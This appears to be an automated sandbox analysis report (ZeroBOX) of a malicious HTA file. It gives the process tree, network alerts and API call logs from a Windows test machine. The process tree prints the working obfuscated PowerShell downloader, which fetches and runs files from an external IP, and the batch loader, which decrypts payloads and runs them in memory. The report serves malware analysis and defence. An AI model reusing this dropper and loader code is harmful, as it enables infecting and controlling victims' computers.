Summary | ZeroBOX

.hta

Category Machine Started Completed
FILE s1_win7_x6401 April 21, 2024, 12:44 p.m. April 21, 2024, 12:46 p.m.
Size 12.8KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 c4c06bc09d5d07d8abdb074e80806d07
SHA256 c5010ef902c9a8421aaf07a4ac475667c0b2ddae0b2d4c2f4c28aa7b7f482b3d
CRC32 0B6FD60E
ssdeep 384:yCG1ce3Nf2/B8L0L2/B8eNnCOHk2/B8ZNUNTBbuq80Kuhv+K0NuG8QS2Va2XKFVq:KuJvVCBy
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\.hta

    2556
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE 
@(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;

      2640
      • notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt

        2812
      • cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\15.bat" "

        2864
        • cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\15.bat"

          2968
          • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 
6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "

            3052
          • powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            604

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
193.222.96.128 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.222.96.128:7287 -> 192.168.56.101:49165 2400036 ET DROP Spamhaus DROP Listed Traffic Inbound group 37 Misc Attack

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:691
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcL
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: N, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeC
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: BFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLg
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: cLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: .exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQx
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{S
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: tart-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ,68407,68404,68400,68409,68415));[Net.ServicePointManager]:: <<<< SecurityProto
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: col = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.Dow
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: nloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsd
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: NnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $g
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: sScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cn
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: ysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){In
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: voke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBF
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: XfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,6
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: 354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluA
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: IEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNul
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: Sp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $Y
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: iQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: 5));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieG
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: jH;
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x00000033
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: At line:1 char:691
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: + function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcL
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: N, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeC
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: BFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLg
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: cLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell
console_handle: 0x0000007f
1 1 0

WriteConsoleW

buffer: .exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQx
console_handle: 0x0000008b
1 1 0

WriteConsoleW

buffer: ZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{S
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: tart-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ,68407,68404,68400,68409,68415));[Net.ServicePointManager]:: <<<< SecurityProto
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: col = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.Dow
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: nloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsd
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: NnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $g
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: sScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cn
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: ysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){In
console_handle: 0x00000107
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e29c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2588
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2588
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2588
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2e48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2f48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e26c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e3348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2dc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e2dc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e2770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e2e70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0226a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02262000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02272000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02273000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02274000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0226b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02275000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02276000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
